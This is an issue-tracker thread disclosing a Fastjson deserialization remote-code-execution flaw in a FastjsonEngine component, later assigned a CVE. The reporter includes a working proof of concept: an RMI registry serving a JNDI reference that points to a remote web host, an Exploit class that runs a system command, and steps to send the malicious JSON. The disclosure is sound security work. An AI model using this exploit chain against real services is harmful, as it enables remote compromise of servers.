lead to RCE when parse JSON string with Fastjson

[idealzh]

The component FastjsonEngine converts a JSON string to an equivalent Java Object based on Fastjson(version 1.2.8);
However,Fastjson version 1.2.24 and prior has a remote code execution vulnerability.
for details,please refer to the links below:
https://fortiguard.com/encyclopedia/ips/44059
http://xxlegend.com/2017/12/06/基于JdbcRowSetImpl的Fastjson%20RCE%20PoC构造与分析/
Upgrade to Fastjson version 1.2.45 or later can fix the issue.

Using the following code snippet to convert a JSON string:

POST("/json",routeContext ->{ String data=routeContext.getRequest().getBody(); FastjsonEngine engine=new FastjsonEngine(); engine.fromString(data, String.class); });

To exploit the vulnerability successfully,we need the following steps:
step1:start a rmi service;
public class Test { /** * @param args * @throws RemoteException */ public static void main(String[] args) throws RemoteException { // TODO Auto-generated method stub Registry registry=LocateRegistry.createRegistry(1099); Reference reference=new Reference("Exploit","Exploit","http://10.0.2.4/"); ReferenceWrapper referenceWrapper = null; try { referenceWrapper = new ReferenceWrapper(reference); } catch (NamingException e1) { // TODO Auto-generated catch block e1.printStackTrace(); } try { registry.bind("Exploit",referenceWrapper); } catch (AlreadyBoundException e) { // TODO Auto-generated catch block e.printStackTrace(); } System.out.println("rmi server started......"); } }

step2:put the Exploit.class under a web service directory which pointed by the rmi service above;
public class Exploit{ public Exploit(){ try{ Runtime.getRuntime().exec("calc"); } catch(Exception e){ e.printStackTrace(); } } }

step3:send a post request contains the malicious JSON string;

[rygel]

@idealzh Thank you for reporting this issue and your suggestion of how to fix it!

[abergmann]

CVE-2017-18349 was assigned to this issue.